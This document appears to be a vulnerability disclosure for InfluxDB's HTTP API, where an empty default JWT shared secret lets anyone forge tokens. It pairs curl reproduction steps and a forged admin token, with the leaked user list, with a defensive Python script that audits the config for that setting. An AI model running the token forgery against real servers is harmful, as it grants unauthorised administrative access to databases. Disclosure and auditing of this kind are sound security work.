0day reproduction steps:
1. Find a user name
curl -G "http://xxx:8086/debug/requests"
2. Construct a JWT token
3. Construct the authentication header
curl -G 'http://xxx:8086/query' --data-urlencode 'q=show users' -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNTU5Mjg0OTM1fQ.tUClNot9LgStSw57n26DSN-3NPkBiHizk-XOHMfJJJw'
Response:
{"results":[{"statement_id":0,"series":[{"columns":["user","admin"],"values":[["admin",true],["read",false],["write",false],["telegraf",true]]}]}]}
Success.
How the vulnerability works
The JWT token shared-secret is empty by default.
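
A configuration check for the empty shared-secret described above, as an added example that is not part of the original post or of InfluxDB's own code. It assumes the InfluxDB 1.x layout, where auth-enabled and shared-secret sit in the [http] section and INFLUXDB_HTTP_* environment variables override the file. The sample config, the function names and the 32-character minimum are constructed for illustration.

```python
import re

# Constructed sample config: authentication on, shared-secret left at its default.
SAMPLE_CONF = """
[meta]
  dir = "/var/lib/influxdb/meta"
[http]
  bind-address = ":8086"
  auth-enabled = true
  # shared-secret = "example"
  shared-secret = ""
"""
MIN_SECRET_LEN = 32  # assumed local policy, not an InfluxDB requirement
KEY_VALUE = re.compile(r'^([\w-]+)\s*=\s*(?:"([^"]*)"|(\S+))')


def http_settings(conf_text, env=None):
    """Collect [http] keys, then apply INFLUXDB_HTTP_* environment overrides."""
    settings, section = {}, None
    for line in (raw.strip() for raw in conf_text.splitlines()):
        if not line or line.startswith("#"):
            continue  # blank line or commented-out setting
        if line.startswith("["):
            section = line.strip("[]").strip()
            continue
        m = KEY_VALUE.match(line)
        if m and section == "http":
            settings[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    for name, value in (env or {}).items():
        if name.startswith("INFLUXDB_HTTP_"):
            settings[name[len("INFLUXDB_HTTP_"):].lower().replace("_", "-")] = value
    return settings


def audit(settings):
    """Return findings for the JWT-related [http] settings."""
    secret = settings.get("shared-secret", "")  # absent key means the empty default
    if settings.get("auth-enabled", "false").lower() != "true":
        return ["auth-enabled is not true: the HTTP API does not require credentials"]
    if secret == "":
        return ["shared-secret is empty: bearer tokens are checked against an empty key"]
    if len(secret) < MIN_SECRET_LEN:
        return [f"shared-secret has {len(secret)} characters, below {MIN_SECRET_LEN}"]
    return []


if __name__ == "__main__":
    for finding in audit(http_settings(SAMPLE_CONF)):
        print("FINDING:", finding)
```

Pass the process environment as the second argument of http_settings when auditing a running host, since an environment override can set or clear the secret regardless of what the file says.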